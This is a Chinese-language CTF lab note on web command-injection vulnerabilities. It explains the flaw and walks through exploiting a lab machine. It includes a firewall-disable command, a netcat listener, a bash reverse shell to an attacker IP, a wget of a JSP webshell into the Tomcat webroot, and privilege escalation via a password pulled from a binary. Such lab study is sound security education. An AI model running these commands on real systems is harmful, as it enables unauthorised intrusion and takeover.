zoukankan      html  css  js  c++  java
  • ctf-web-web安全命令执行漏洞-思路笔记

    命令执行漏洞介绍

    • 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。
    • 调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过虑用户的输入的情况下,就会造成命令执行漏洞。

    手动渗透流程

    1. 信息探测image
    2. 深度挖掘,发现可利用命令漏洞image
    3. 漏洞利用
      1. 查看临时缓冲目录: ls -alh /tmp/
      2. 查看home目录,挖掘用户信息:ls -alh/home/image
      3. 查看具体用户的目录:ls -alh/home/用户名/
      4. 查看系统信息: uname –a
      5. 利用ssh命令执行root权限命令:
        1. 使用ssh用户名@localhost通过ssh登录服务器是不需要身份验证的;
        2. 查看bill用户sudo命令的权限:ssh bill@localhost sudo –l
        3. 关闭防火墙: ssh bill@localhost sudo ufw disable
    4. 生成上传shell
      1. 攻击机启动监听netcat:nc -nlvp. 4444
      2. 靶场机器反弹tcp到shell:ssh bill@localhost  sudo bash -i >& /dev /tcp/攻击机IP/4444  0>&1
      3. 方法二-也可以上传SHELL渗透测试技巧
        1. 开启python简易http服务器:python -m SimpleHTTPServer
        2. 利用命令执行下载木马文件:ssh bill@localhost sudo wget "http:/ /ip:port/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

    使用集成工具测试web命令执行漏洞

    1. 信息探测
      1. 使用sparta工具进行信息探测
      2. 输入sparta打开工具
      3. image
      4. dirbuster需要设置的字典在这,设置已知信息image
      5. 查看已经扫描到的敏感信息,发现一对hashimage
      6. 破解hash得到密码,尝试登陆,登陆成功image
    2. 漏洞利用
      1. 使用AVWS工具进行扫描没有发现漏洞
    3. 反弹shell
      1. image
      2. 查找敏感信息,发现一个image
      3. 进入该文件夹,发现两个文件,查看说明,cutomPermissionApp是个用户权限提升文件image
      4. 使用string命令查看文件有哪些敏感字符串image
      5. 发现敏感信息image
      6. 去掉H得到一个密码image
      7. 尝试登陆su:sudo su  回车输入密码成功提升权限
  • 相关阅读:
    继承中类的作用域
    访问控制与继承
    虚函数与抽象基类
    定义基类和派生类
    类成员指针
    固有的不可移植特性
    局部类
    union
    嵌套类
    枚举类型
  • 原文地址:https://www.cnblogs.com/zw7889/p/13597919.html
Copyright © 2011-2022 走看看